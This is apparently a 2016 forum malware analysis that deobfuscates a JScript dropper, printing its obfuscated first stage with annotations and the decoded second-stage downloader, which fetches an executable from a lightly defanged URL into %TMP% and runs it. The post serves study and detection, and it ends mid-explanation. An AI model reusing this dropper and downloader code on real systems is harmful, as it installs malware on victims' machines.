Malware Analysis Deobfuscation of 'document_iWMYTy.js' (1/56 : 31_08_2016)

DardiM

From : https://malwaretips.com/threads/31-8-16-6.62930/
Thanks to @Solarquest)

Sample 5:

5 document_iWMYTy.js


1/56
Antivirus scan for f2b23bb90176ea682246d191c47d5ce890d1362b51316f7f4862d165c3bac11c at 2016-09-05 10:39:45 UTC - VirusTotal

Why this sample ?

Obfuscation Method never analysed by me at MT.

1) What it looks like :

// Expands an environment string through the WScript.Shell object held in
// obWnumtlk (created later in this listing). The argument comes from
// omYcXJw(), which (see below) reassembles the literal "%TMP%".
function vieag() {
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}

// Builds the drop path %TMP%\dDhUJJXRFIby.js: '%T' + 'MP%' only splits the
// literal, String.fromCharCode(92) is the backslash. cJsHVL below writes the
// decoded second stage to this file.
function dbusESbAHhk() {
return obWnumtlk.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'dDhUJJXRFIby.js'
}

// String table used by the whole dropper. Every entry is plain ASCII written
// with \x hex escapes so the literals never appear in the file. Decoded
// values (also listed in section 2-1):
var TmOQLQMiKBSHZM = [];
TmOQLQMiKBSHZM.push("\x6b" + "\x56" + "\x4d"); // [0] "kVM": 3-char junk prefix that ZmDvKDROUbeY strips again
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74"); // [1] "Scripting.FileSystemObject"
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c"); // [2] "WScript.Shell"
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79"); // [3] "dDhUJJXRFIby": dropped file name without extension
TmOQLQMiKBSHZM.push(""); // [4] "": join separator for the custom alphabet (jnMWjogwsmcQ)
TmOQLQMiKBSHZM.push(""); // [5] "": seed of the decoder's output accumulator
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b"); // [6] decoy-padded pieces; pieces 1,5,7 give "%TMP%"
TmOQLQMiKBSHZM.push("\x2a"); // [7] "*": separator for [6]
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75"); // [8] decoy-padded pieces; pieces 2,4,8,10 give "wscript.exe " (trailing space)
TmOQLQMiKBSHZM.push("\x2a"); // [9] "*": separator for [8]
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79"); // [10] decoy-padded pieces; pieces 0,3,6 give ".js"
TmOQLQMiKBSHZM.push("\x2a"); // [11] "*": separator for [10]
TmOQLQMiKBSHZM.push("\x72\x75\x6e"); // [12] "run": WScript.Shell method name used by AfzFZ

// String-reassembly decoder. Splits mzSWDJgPXR on the separator
// miNczRxyhlryzl, concatenates only the pieces whose indices are listed in
// TTrBlYfs (the others are decoys) after the 3-char prefix
// TmOQLQMiKBSHZM[0] ("kVM"), then strips that prefix again with substring(3).
// fjgRFPuky, UjSexL and qKoHV are assigned without var and so become
// globals.
function ZmDvKDROUbeY(mzSWDJgPXR, TTrBlYfs, miNczRxyhlryzl) {

fjgRFPuky = mzSWDJgPXR.split(miNczRxyhlryzl); // real pieces mixed with decoys
UjSexL = TmOQLQMiKBSHZM[0]; // "kVM", removed again at the end
qKoHV = 0;
while (true) {
if (qKoHV >= TTrBlYfs.length) {
break;
}
UjSexL += fjgRFPuky[TTrBlYfs[qKoHV]]; // keep only the indexed pieces, in order
qKoHV++;
}
return UjSexL.substring(3, UjSexL.length); // drop the 3-char prefix
}
// Stall loop: sleeps in 1-second steps until the elapsed time, read back
// through Date.getSeconds() on a Date built from the elapsed milliseconds,
// exceeds 5 (roughly 6 seconds). Only then is the custom alphabet that
// jnMWjogwsmcQ needs defined. Looks like a sandbox/emulator time-out
// evasion -- static reading only, not confirmed dynamically.
// The alphabet is the 64 Base64 characters plus '=' (65 entries) in a
// shuffled order; '=' sits at index 64, which the decoder tests as padding.
caIjqKdglgHJ = new String(); // undeclared global; replaced by the array below
var llstSfBy = new Date();
while (true) {

var dSbro = new Date();
var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime()); // elapsed ms reinterpreted as a Date
if (oZnEUHR.getSeconds() > 5) {
caIjqKdglgHJ =
["Z", "B", "z", "k", "3", "E", "F", "G", "H", "I", "J", "K", "L", "a", "b", "c", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "A", "0", "1", "2", "4", "6", "7", "8", "9", "M", "N", "O", "d", "e", "f", "g", "h", "i", "j", "5", "D", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "C", "+", "/", "="];
break;
}
WScript.Sleep(1000);
}

// The second stage, stored as one long blob in the shuffled-alphabet Base64
// and decoded at load time by jnMWjogwsmcQ (declared further down; function
// declarations are hoisted, so the call works). The decoded text is the
// downloader script shown in section 2-3. The blob is elided here ("....").
var tQsqVjHOaCz =
jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==
");

// COM objects used to drop and launch the second stage:
//   aEDGtMwt  = Scripting.FileSystemObject (TmOQLQMiKBSHZM[1])
//   obWnumtlk = WScript.Shell              (TmOQLQMiKBSHZM[2])
// Both are created through immediately-invoked function expressions that add
// nothing but indirection; the inline /*...*/ comment is filler.
var aEDGtMwt = function() {
return new /*nzknJaFEhAKPCE*/ ActiveXObject(TmOQLQMiKBSHZM[1]);
}();
var obWnumtlk = function() {
return WScript.CreateObject(TmOQLQMiKBSHZM[2]);
}();


// Dropper entry point:
//  1) cJsHVL writes the decoded second stage (tQsqVjHOaCz) to
//     %TMP%\dDhUJJXRFIby.js through the FileSystemObject;
//  2) AfzFZ runs "wscript.exe %TMP%\dDhUJJXRFIby.js" through WScript.Shell's
//     run method (MACECTYk() -> "wscript.exe ", vieag() -> "%TMP%",
//     TmOQLQMiKBSHZM[3] -> "dDhUJJXRFIby", FhMKtMKvYiYM() -> ".js").
// Detection angle: wscript.exe launching wscript.exe on a .js file that was
// created moments earlier in %TMP%.
cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz);
AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());

// Index of the character ruDSpJjoOhOUdgUMIeWzHtiu in tiAiWOziPrDiGLmueE
// (used to map an alphabet symbol to its 6-bit value). The argument-less
// replace() is a decoy: with no arguments it returns the string unchanged.
function HUILQ(tiAiWOziPrDiGLmueE, ruDSpJjoOhOUdgUMIeWzHtiu) {
return tiAiWOziPrDiGLmueE.replace().indexOf(ruDSpJjoOhOUdgUMIeWzHtiu);
}

// Wrapper around String.prototype.charAt: character of HGvGWQ at index nCVYGG.
function UfqHaxTeCQG(HGvGWQ, nCVYGG) {
return HGvGWQ.charAt(nCVYGG);
}

// Wrapper around String.fromCharCode for a single code unit.
function U(QnWoxb) {
return String.fromCharCode(QnWoxb);
}

// Wrapper around String.fromCharCode for two code units.
function TglQpUJYnasMCzqPfgTwOSOz(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj) {
return String.fromCharCode(lFrZgairLtIxc, nBovdQteoUBYexzKnxvEXzj);
}

// Wrapper around String.fromCharCode for three code units.
function rQlGTCjHRbJZnHat(YpgYd, iZjlYtirmkiRe, fCyitEoyAt) {
return String.fromCharCode(YpgYd, iZjlYtirmkiRe, fCyitEoyAt);
}

// Base64 decoder over the shuffled alphabet in caIjqKdglgHJ, joined into one
// string with TmOQLQMiKBSHZM[4] (""). Standard Base64 apart from the symbol
// order: four input symbols are mapped to their alphabet index, packed into
// 24 bits and emitted as 1-3 characters; index 64 is '=' (padding) and
// shortens the last group. HUILQ / UfqHaxTeCQG / U / TglQpUJYnasMCzqPfgTwOSOz /
// rQlGTCjHRbJZnHat are trivial wrappers around indexOf / charAt /
// String.fromCharCode.
// Caveat (no validation): a character outside the alphabet yields -1 from
// indexOf and silently corrupts the output; charAt past the end returns ""
// whose indexOf is 0, so inputs whose length is not a multiple of 4 are
// decoded with phantom zero symbols rather than rejected.
function jnMWjogwsmcQ(DMEuOowRNhVpr) {
var JqkRfASu = caIjqKdglgHJ.join(TmOQLQMiKBSHZM[4]); // alphabet as a 65-char string
var vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc, LvrhFZyNyrGsaqIJifC, HXgoXumRiuvv, MwYntz, AiPBbLknEwhGuevKCo, IoPdTYglGU, ziKcqJ = 0,
jxFGihBSHFlEz = TmOQLQMiKBSHZM[5]; // output accumulator, starts as ""
do {
// four 6-bit symbol values
LvrhFZyNyrGsaqIJifC = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
HXgoXumRiuvv = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
MwYntz = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
AiPBbLknEwhGuevKCo = HUILQ(JqkRfASu, UfqHaxTeCQG(DMEuOowRNhVpr, ziKcqJ++));
IoPdTYglGU = LvrhFZyNyrGsaqIJifC << 18 | HXgoXumRiuvv << 12 | MwYntz << 6 | AiPBbLknEwhGuevKCo; // 24-bit group
vEBNBCDIChAFPrCSrYS = IoPdTYglGU >> 16 & 0xff;
UNZukwlBEmwIIUfPGGosxeq = IoPdTYglGU >> 8 & 0xff;
gGalhxhiZQBIASErc = IoPdTYglGU & 0xff;
// 64 == index of '=' in the alphabet: "xx==" -> 1 byte, "xxx=" -> 2 bytes
if (MwYntz == 64) jxFGihBSHFlEz += U(vEBNBCDIChAFPrCSrYS);
else if (AiPBbLknEwhGuevKCo == 64) jxFGihBSHFlEz += TglQpUJYnasMCzqPfgTwOSOz(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq);
else jxFGihBSHFlEz += rQlGTCjHRbJZnHat(vEBNBCDIChAFPrCSrYS, UNZukwlBEmwIIUfPGGosxeq, gGalhxhiZQBIASErc);
} while (ziKcqJ < DMEuOowRNhVpr.length);
return jxFGihBSHFlEz;
}

// Reassembles "%TMP%" from table entry [6] (pieces 1, 5, 7, split on "*").
function omYcXJw() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[6], [1, 5, 7], TmOQLQMiKBSHZM[7]);
}

// Reassembles "wscript.exe " (with trailing space) from table entry [8]
// (pieces 2, 4, 8, 10, split on "*").
function MACECTYk() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[8], [2, 4, 8, 10], TmOQLQMiKBSHZM[9]);
}

// Reassembles ".js" from table entry [10] (pieces 0, 3, 6, split on "*").
function FhMKtMKvYiYM() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[10], [0, 3, 6], TmOQLQMiKBSHZM[11]);
}

// EOJUGdwva["run"](upIslkONuZdKS, 1, 0): invokes WScript.Shell's Run with
// the command line upIslkONuZdKS; the method name is fetched from
// TmOQLQMiKBSHZM[12] through a one-element array purely to hide the literal
// "run". The 0x1 / 0x0 arguments are Run's window-style and wait flags.
function AfzFZ(EOJUGdwva, upIslkONuZdKS) {
var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]]; // ["run"]
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}

// Writes mqUyTKyNSmm (the decoded second stage) as one line to the text file
// VjTGaiNuUBPgF, created or overwritten through the FileSystemObject UvzvIA,
// and closes the handle.
function cJsHVL(UvzvIA, VjTGaiNuUBPgF, mqUyTKyNSmm) {
var TpMPzXgtwzTg = XkEZqeLzGdBEgB(UvzvIA, VjTGaiNuUBPgF);
TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);
TpMPzXgtwzTg.Close();
}

// FileSystemObject.CreateTextFile(path, overwrite=true): returns a TextStream
// on QADeBTGed, replacing any existing file.
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}
It may look complicated, but proceeding as in my previous analyses, we will see it is not too hard to understand.

2) Looking for the important parts :

Always separate the functions from the other values:

2-1) The tab :

// The string table again, each entry hidden behind \x hex escapes.
var TmOQLQMiKBSHZM = [];
TmOQLQMiKBSHZM.push("\x6b" + "\x56" + "\x4d"); // [0] "kVM" (junk prefix)
TmOQLQMiKBSHZM.push("\x53" + "\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74"); // [1] "Scripting.FileSystemObject"
TmOQLQMiKBSHZM.push("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c"); // [2] "WScript.Shell"
TmOQLQMiKBSHZM.push("\x64\x44\x68\x55\x4a\x4a\x58\x52\x46\x49\x62\x79"); // [3] "dDhUJJXRFIby"
TmOQLQMiKBSHZM.push(""); // [4] ""
TmOQLQMiKBSHZM.push(""); // [5] ""
TmOQLQMiKBSHZM.push("\x72\x4a\x6b\x50\x6d\x48\x76\x69\x53\x4f\x74\x73\x4b\x4c\x2a\x25\x54\x2a\x54\x63\x44\x43\x50\x67\x4f\x64\x64\x79\x5a\x72\x56\x2a\x4b\x58\x67\x54\x69\x6d\x41\x66\x5a\x2a\x6d\x6e\x43\x48\x63\x75\x73\x75\x79\x71\x66\x4c\x51\x70\x2a\x4d\x2a\x55\x58\x75\x61\x72\x49\x4a\x76\x78\x2a\x50\x25\x2a\x78\x6c\x78\x64\x69\x71\x76\x4b"); // [6] pieces for "%TMP%"
TmOQLQMiKBSHZM.push("\x2a"); // [7] "*"
TmOQLQMiKBSHZM.push("\x50\x6f\x71\x65\x6e\x43\x6a\x62\x4e\x55\x4f\x43\x74\x64\x2a\x5a\x63\x41\x48\x7a\x43\x64\x4b\x61\x4f\x49\x54\x6e\x2a\x77\x2a\x6c\x71\x6d\x4f\x73\x2a\x73\x63\x72\x69\x70\x2a\x41\x6c\x6b\x68\x54\x6d\x45\x2a\x77\x78\x6a\x73\x6b\x2a\x4e\x70\x76\x54\x70\x52\x6b\x76\x6e\x2a\x74\x2e\x65\x2a\x43\x73\x6a\x4d\x48\x2a\x78\x65\x20\x2a\x59\x44\x65\x43\x4a\x4c\x66\x54\x72\x6c\x6b\x41\x76\x75"); // [8] pieces for "wscript.exe "
TmOQLQMiKBSHZM.push("\x2a"); // [9] "*"
TmOQLQMiKBSHZM.push("\x2e\x2a\x65\x49\x61\x59\x49\x59\x6c\x64\x52\x72\x48\x75\x54\x2a\x47\x72\x76\x7a\x54\x2a\x6a\x2a\x42\x61\x6b\x74\x68\x69\x52\x2a\x43\x78\x72\x59\x6c\x52\x71\x2a\x73\x2a\x62\x66\x43\x68\x43\x6a\x67\x71\x4d\x4e\x6c\x54\x2a\x69\x4c\x65\x52\x5a\x59\x56\x45\x61\x68\x56\x75\x79"); // [10] pieces for ".js"
TmOQLQMiKBSHZM.push("\x2a"); // [11] "*"
TmOQLQMiKBSHZM.push("\x72\x75\x6e"); // [12] "run"
An array of strings hidden behind \x hex escapes.

Real content :

"kVM"
"Scripting.FileSystemObject"
"WScript.Shell"

"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"​

What look like strange strings are in fact used later by the script, when needed.
Several different manipulations are used to deobfuscate strings in this sample.

One example for the moment :

"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe

=> wscript.exe
2-2) Timer and another important array:

// Delay loop (about 6 seconds of 1-second sleeps) before the shuffled
// Base64 alphabet is defined; likely a sandbox time-out evasion.
caIjqKdglgHJ = new String();
var llstSfBy = new Date();
while (true) {

var dSbro = new Date();

var oZnEUHR = new Date(dSbro.getTime() - llstSfBy.getTime()); // elapsed ms as a Date

if (oZnEUHR.getSeconds() > 5) {
caIjqKdglgHJ =
["Z", "B", "z", "k", "3", "E", "F", "G", "H", "I", "J", "K", "L", "a", "b", "c", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "A", "0", "1", "2", "4", "6", "7", "8", "9", "M", "N", "O", "d", "e", "f", "g", "h", "i", "j", "5", "D", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "C", "+", "/", "="]; // 64 Base64 chars + '=' at index 64, shuffled
break;
}
WScript.Sleep(1000);
}

The script waits about 5 seconds (likely a sandbox-evasion delay) and then creates an array of chars:

=> if I put it in a string, you will see better what this array is for :)
"ZBzk3EFGHIJKLabcPQRSTUVWXYA01246789MNOdefghij5DlmnopqrstuvwxyC+/="​

=> the Base64 characters and '=', in a different order than the standard alphabet ;)

=> used to perform a pseudo-Base64 decode of data encoded with this custom alphabet :p

Their decoding function :

// Custom-alphabet Base64 decoder; the full body is in the listing of section 1.
function jnMWjogwsmcQ(string_to_be_decoded) {
...
...
}
2-3) What is hidden in this long string?

// The second stage, decoded at load time from the shuffled-alphabet Base64
// blob (elided below).
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BKArUdQ9ZCHEj9AGQq1kflKsQh1GIO1tQgYsTD0dUqKp3nLSZmLzCj0s2pKsnlYtLD1F8mHOqxkPgsXWH7UTUaRkqsLp15aMLtbmqJ2s8g0FTf2GIrYRN74mqJAVXfRs5UYNXD0FUDYtQfckquLMP5bkHqJRB91dU8ApjazeY819BBXU2kHkq7PdnjXqaeAR7gHzT7Rs5UYNXD0FUDYtQfbmqJ2dEoH3nBTd8qAVElUMrKArUdQO5BXU2kWSjazeY819B5QN
...
...
");


tQsqVjHOaCz will contain the custom-Base64-decoded string, which holds the very important parts:
I put in red and blue bold what deserves a close look :)
"
// WScript.Shell.Run(command, 0x1, 0x0): launches lyIeDpMXMkDr through the
// shell object GdtgzRtj; same flags as AfzFZ in the first stage.
function fFloYJxrMq(GdtgzRtj,lyIeDpMXMkDr) {
GdtgzRtj.Run(lyIeDpMXMkDr, 0x1, 0x0);
}

/*hZueDKcaxatndMqwelrFMrwtNvdRsojDmqnKHqpQoILZtjAQGmivoHFrbNsLfwrhmZbKGpvYZKXdDbFDcFSEJqIKizAaMXsfedIdyIuADfcBGlDLsswhYtFwjECImRmvQAiQjvnwbUbtDPulBzTegPuBdcxJFfbgwqCWOBaLscTEtNffDZjuhEeaRUmeSNIjVAPwmaGuCE*/
// The comment above is filler. ievgNtwHpzBVt's body is entirely commented out
// (a disabled Sleep of 5390-457 = 4933 ms), so this call is a no-op.
ievgNtwHpzBVt();

// Second-stage downloader/launcher (the decoded dDhUJJXRFIby.js).
// KkUfF: list of payload URLs, one here (shown defanged with a space and
// split across two lines by the forum rendering).
// Each pass: pick a random valid index, build %TMP%\xgRqdfZ_<n>.exe where n
// is a random integer from BllcCgi(), fetch the URL with MSXML2.XMLHTTP
// (nGQI), save the body through ADODB.Stream when the status is 200 (NXbWm),
// run it through WScript.Shell.Run (fFloYJxrMq), then query WMI for a
// Win32_Process with that file name and stop once one exists. The used URL
// is spliced out afterwards, so with a single URL the loop ends after one
// pass either way. Arithmetic such as 637-637 / 824-824 is just 0; 877-876
// and 460-459 are 1. The empty catch swallows every error (e.g. a failed
// download leaves SJQWojo pointing at a file that does not exist).
// Note: hUbTAlCkvX (bare name) and SJQWojo (full path) share the same random
// mFGoe; SJQWojo is re-declared with var below.
var KkUfF = ["
http ://djprestige.net/111000/logs/logs.php"];
var UEMH=637-637;
while(true) {

if(KkUfF.length<=824-824) break;
var AaWC = BllcCgi() % KkUfF.
length;
var LARhtiaoV=KkUfF[AaWC];
var mFGoe=BllcCgi();
var hUbTAlCkvX='
xgRqdfZ_'+mFGoe +'.exe';
var SJQWojo='xgRqdfZ_'+mFGoe +'.exe';
var AHsFmJCp=877-876;
var oidVjrlxN = function(){

return new ActiveXObject(NLqcZ('WS&niOiBwhcg&cript&niOiBwhcg&.She&l&l',[0,2,4,5,6],'&')); // "WScript.Shell"
}();
var SJQWojo = DwfHWk(oidVjrlxN) + String.fromCharCode(92) + SJQWojo; // %TMP%\xgRqdfZ_<n>.exe
var CDKBT = function(){

return new ActiveXObject(NLqcZ('MSX&PRNJPlMpg&ML2.XM&hYYzXVOhACp&LHTTP',[0,2,4],'&')); // "MSXML2.XMLHTTP"
}();
nGQI(LARhtiaoV,CDKBT); // synchronous GET
if (CDKBT.status == 100+100) { // HTTP 200

var xvtZQuA = function() {
return new ActiveXObject(NLqcZ('ADO&DB&NhrHELmvq&.&DMIkBQbWW&Stream',[0,1,3,5],'&')); // "ADODB.Stream"
}();
var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.
ResponseBody,SJQWojo); // write the response body to disk
}
try {

fFloYJxrMq(oidVjrlxN,SJQWojo); // run the downloaded file
var LxaYiEy =
GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\''); // is it running?
if ( LxaYiEy.Count >= 1 ){

break;
}
} catch(e) {}
UEMH++;
KkUfF.splice (AaWC,460-459); // remove the URL just tried
}
// hYTCRr.ExpandEnvironmentStrings('%TMP%'): the method name is fetched from a
// one-element array to hide the literal. Returns the user's temp directory.
function DwfHWk(hYTCRr){

var IycTzaXN=["ExpandEnvironmentStrings"];
return hYTCRr[IycTzaXN[0]](
'%TMP%')
}
// Saves the HTTP response body KFvNO to the file rvXDAccOxN through the
// ADODB.Stream object mCUmexcU: open, type=1 (binary), write, position=0,
// saveToFile(path, 2), read size, close. Returns the stream size, or
// undefined if any step threw -- the empty catch hides all failures.
function NXbWm(mCUmexcU,KFvNO,rvXDAccOxN){

try{
mCUmexcU.open();
dcdEgRlK(mCUmexcU); // type = 1
gTHAzTo(mCUmexcU,KFvNO); // write(body)
OtcrlNKfx(mCUmexcU); // position = 0
tVYh(mCUmexcU,rvXDAccOxN); // saveToFile(path, 2)
iGZCSRAS=mCUmexcU.
size; // undeclared global
MsCkKpm(mCUmexcU); // close()
return iGZCSRAS;
}
catch(e){}
}
// Synchronous HTTP GET of XKowap through the XMLHTTP object LhcfAni. The
// verb "GET" is rebuilt from pieces 0, 2, 3 of a '*'-split string. The
// User-Agent is spoofed as "Python-urllib/3.1"; a WSH/XMLHTTP client
// presenting that header is a usable proxy-log indicator for this sample.
// Errors are swallowed; the caller only looks at LhcfAni.status afterwards.
function nGQI(XKowap,LhcfAni){

try{
uyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*'); // ["G","RXeyIPlrFs","E","T",...]
LhcfAni.
open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false); // "GET", async=false
LhcfAni.
setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.
send();
}
catch(e){}
}

// Same string-reassembly decoder as ZmDvKDROUbeY in the first stage: split
// NdPrkNQo on DpwZyRyCb, keep the pieces indexed by hDYOkm, prepend the
// 3-char junk 'kwN' and strip it again with substring(3). ELGAP, RCerksA and
// QtfdnNuX are implicit globals.
function NLqcZ(NdPrkNQo,hDYOkm,DpwZyRyCb){

ELGAP=NdPrkNQo.split(DpwZyRyCb);
RCerksA = 'kwN';
for(QtfdnNuX=0;QtfdnNuX<hDYOkm.length;QtfdnNuX++) {
RCerksA+=ELGAP[hDYOkm[QtfdnNuX]];
}
return RCerksA.substring(3,RCerksA.length);
}

// No-op: the only statement (a WScript.Sleep of 5390-457 ms via
// xzFsWaRFUg()) is commented out.
function ievgNtwHpzBVt() {
/*xzFsWaRFUg().Sleep(5390-457);*/
}

// Math.random() looked up by name through a one-element array.
function iREZTlp(){

var PfySEO=["random"];
return Math[PfySEO[0]]()
}
// qqGjrm.open(); not called anywhere in this listing (NXbWm calls open()
// directly) -- dead code.
function OYRG(qqGjrm) {
qqGjrm.open();
}
// Sets the ADODB.Stream type to 1 (binary) so the response bytes are stored
// unmodified.
function dcdEgRlK(oHaxAbhhn) {

oHaxAbhhn.type=1;
}
// LmvV.write(SYiUv): appends the response body to the stream.
function gTHAzTo(LmvV,SYiUv) {

LmvV.write(SYiUv);
}

// Returns the WScript host object; only referenced from the commented-out
// Sleep in ievgNtwHpzBVt. The inline comment is filler.
function xzFsWaRFUg() {

return/*LiDIlHHYQgtUykxOIYfyrbdpZyBgDUloDttFWBKygwvKhJlGxtsfZfCzmYZFjCwQpYdXAOGsrfqTKBSRfhzgACVctRryJFALUWGHYvvFu*/WScript;
}
// Rewinds the stream: position = [].length * constant = 0.
function OtcrlNKfx(BMJavz) {

var CaGOHdTYym=[];
BMJavz.
position=CaGOHdTYym.length*(5229892-628);
}
// TWHSDTw.saveToFile(ZjePGWv, 2): writes the stream to disk, 2 meaning
// create-or-overwrite for ADODB.Stream.SaveToFile.
function tVYh(TWHSDTw,ZjePGWv) {

TWHSDTw.saveToFile(ZjePGWv, 2);
}
// pIaLc.close(): releases the stream.
function MsCkKpm(pIaLc) {

pIaLc.close();
}
// Random integer in [100, 100000]: Math.round(random * (100000-100) + 100).
// Used both as the URL index modulus input and as the executable-name suffix.
function BllcCgi() {

var YSrn=100000;
var TCcqLl = 100;
return Math.round(iREZTlp()*(YSrn-TCcqLl)+TCcqLl);
}
// Would build a random string of YwbAV ASCII letters, but hcAQr is never
// declared or initialised, so the first += would throw. Not called anywhere
// in this listing -- dead code.
function ZMXXuqDs(YwbAV) {

var UpaZeRXt='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
for(var QGWQw=0;QGWQw<YwbAV;QGWQw++){

hcAQr+=UpaZeRXt.charAt(Math.floor(Math.random()*UpaZeRXt.length));
}
return hcAQr;
}
// new ActiveXObject(progId) wrapper; not called in this listing, the script
// instantiates its COM objects inline instead.
function FjceKtzTtdcNGT(ygVSYOjHodWpET) {

return new ActiveXObject(ygVSYOjHodWpET);
}
"

Look at this function, NLqcZ, which is called several times:

One example :

